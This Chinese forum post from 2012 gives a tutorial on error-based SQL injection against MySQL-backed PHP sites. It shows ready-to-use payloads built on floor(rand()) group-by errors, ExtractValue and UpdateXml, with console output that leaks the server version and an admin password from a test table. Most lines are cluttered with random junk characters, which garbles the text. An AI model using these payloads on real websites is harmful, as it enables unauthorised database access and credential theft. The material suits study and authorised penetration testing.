放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
4 s: C# V4 T0 k+ g& p; f实际测试环境:
3 u0 U6 P' K& q! K/ c/ |: z6 D" N& l
9 Q+ o3 { I( T1 N3 F4 h: I6 r) H
mysql> show tables;
& v, z7 d) z9 x$ ]1 R2 M5 ^+----------------+- J, a9 C; {+ ~( H/ I& f
| Tables_in_test |
( [8 p) m1 f/ U: F+----------------+
2 z" w. z$ T6 j+ D- j# a# f| admin |* N6 f6 O$ P& H1 x$ m
| article |
& c" c+ e/ a2 Q0 v+----------------+! G9 U9 f. Y% ^$ e3 \% `# k
X; X- @/ M. l1 @1 c, a: @5 o: d% K
4 K7 s( Q7 e8 f5 T, f4 t+ E" R
s) s, I) Y: x0 ^$ A
mysql> describe admin; p( e) H$ D3 B0 Y1 E1 v9 l; U7 w
+-------+------------------+------+-----+---------+----------------+1 b, @0 ?, }; S: { |
| Field | Type | Null | Key | Default | Extra |( |9 x5 I9 b! j& J: {# A
+-------+------------------+------+-----+---------+----------------+/ a4 H/ o3 t2 w2 G$ m
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
" }4 q2 ?% x/ L' G| user | varchar(50) | NO | | NULL | |- S) v; R: z; S' y( l
| pass | varchar(50) | NO | | NULL | |* R+ A8 s' k0 _8 v
+-------+------------------+------+-----+---------+----------------+$ M$ e/ T l7 r/ ^" X- K2 X& z
. B$ r$ @' O1 [) p; S0 ` ' D; L. k: T/ k7 U
2 F0 w6 w; b# h+ |
mysql> describe article;+ B# C& T* A1 p$ u$ c( x
+---------+------------------+------+-----+---------+----------------+6 x0 V, I+ r# k% ^5 |5 i
| Field | Type | Null | Key | Default | Extra |+ h, z( x0 Q) d, A( j3 m
+---------+------------------+------+-----+---------+----------------+9 V- C- j; d6 b! n3 C$ Q
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |# _, g& A# z* ?8 l9 \# }% A
| title | varchar(50) | NO | | NULL | |
0 ~- ]6 J) G0 r! w) C8 B1 n| content | varchar(50) | NO | | NULL | |) j Y5 y9 B- }
+---------+------------------+------+-----+---------+----------------+
" r, B) k0 H, y. k" w# J8 W1 y1、通过floor报错" u# D+ \8 R5 |
可以通过如下一些利用代码) ~& }( S+ F5 R/ M* x" u
) L( D c2 i7 I0 I
& n$ b: b3 T( e6 T& oand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x. |/ l) [. z& a: h# N
from information_schema.tables group by x)a);
: [) A& N; G! C. Z
Y, T% y5 C" c7 X( ^
0 [6 g$ w( ~! G6 _ Hand (select count(*) from (select 1 union select null union select !1)x
! } S6 u) E/ }group by concat((select table_name from information_schema.tables limit 1),
9 ^9 w. L- c# ]! |- x% nfloor(rand(0)*2)));
9 W& ]$ ^- W/ D2 {6 _, a举例如下:
, ^: l7 T4 n% w) u# N! b6 \% X首先进行正常查询:- @: P; A( f+ c
8 z* z$ G6 j- a2 ^9 {, @7 r
mysql> select * from article where id = 1;1 |1 x# y2 q/ _) L% b) l) t* N
+----+-------+---------+
0 u4 e7 h4 V2 m| id | title | content |
) ^- X, T* ?& P! P. t9 Y/ w* @+----+-------+---------+5 K6 \! @' c) |/ p4 J7 V
| 1 | test | do it |
* R! w9 E' I( E, v% S! j& R+----+-------+---------+
$ d4 |$ F: q* E' ~* }! t假如id输入存在注入的话,可以通过如下语句进行报错。
4 P$ ]* u# c6 y9 ~
! W$ O- t) d' F$ w' x% K
2 A7 ^4 ^& D" `& `0 a9 Omysql> select * from article where id = 1 and (select 1 from- p. d% T; M7 l/ ]
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);( _9 A* z6 e$ a) A1 Q7 h/ M
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'& e4 I) S3 H5 C8 q/ w* \
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
2 q" k# P/ S0 {8 ?% }2 e9 k例如我们需要查询管理员用户名和密码:
- f: z- s; `9 U2 y" mMethod1:
3 A3 I. J2 Y" ~ o. i3 U ) M1 x) W1 _& c: O
& _& f* s% `: @mysql> select * from article where id = 1 and (select 1 from
/ w# s; P/ e/ A. w4 V( T* F4 g(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x/ ~0 `$ f% s( W! l" J
from information_schema.tables group by x)a);
4 U2 E! t9 q- m" `! MERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
$ A. V& B2 d! \1 c" m; y- m6 o# iMethod2:3 { E6 z. |1 T! t; m
, M& M5 `# O, r, ?
8 F8 u8 I3 z, Q; V9 s1 P( l% E+ e
mysql> select * from article where id = 1 and (select count(*)
7 |9 P* a4 L3 _$ g7 ifrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
/ S# U0 c' p5 Q0 f0 zfloor(rand(0)*2)));
8 P; x: L" d! I, A6 H( d0 dERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'! H* x6 [7 Q! f, X+ A
2、ExtractValue* i4 \. y2 Z' d9 C1 U9 y1 ]2 b
测试语句如下2 h0 c. }$ [2 @# [4 b7 s8 I
7 v+ D' I5 l! }1 ^ ' |! D. @% {0 ?1 c$ r B4 U
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
6 E$ C- ]8 d$ Y7 U9 d4 T Q8 S实际测试过程( ]! ]5 s9 H0 g8 U
9 c& ~: O, U0 Y$ z: D. a. t: S# d / O' w: d/ T P
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,% L5 J# H2 P% J' G7 _% q
(select pass from admin limit 1)));--# M* D F) Q" J( M( t; Z4 j
ERROR 1105 (HY000): XPATH syntax error: '\admin888'6 g0 |. h. s, Z! V# H9 ~
3、UpdateXml
0 f: l6 t2 ]5 H; n7 d测试语句* a& B$ j9 \7 X4 i7 }4 A. G s; C
7 w0 r/ n& W( p6 p4 M
! F# }) P' V$ ^# Iand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))8 ?) Q! w! }1 @6 s
实际测试过程5 N, L$ C0 x z
. g8 ~3 g- S5 u) y
3 z$ @# Y( M7 Ymysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24, T+ x* G8 N w
(select pass from admin limit 1),0x5e24),1));7 W+ V4 f, a% ?3 }) Q! n. ^4 }
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$', ?) I ]/ c0 l- _* h8 C
All, thanks foreign guys.# h0 F& ]* m/ F3 C; ], E
2 r! {. L+ U# e$ Z* ^/ D- |
6 `) k1 `. d' V, a0 K6 ?/ b# N |
发表于 2012-12-10 10:28:51
收藏
支持
反对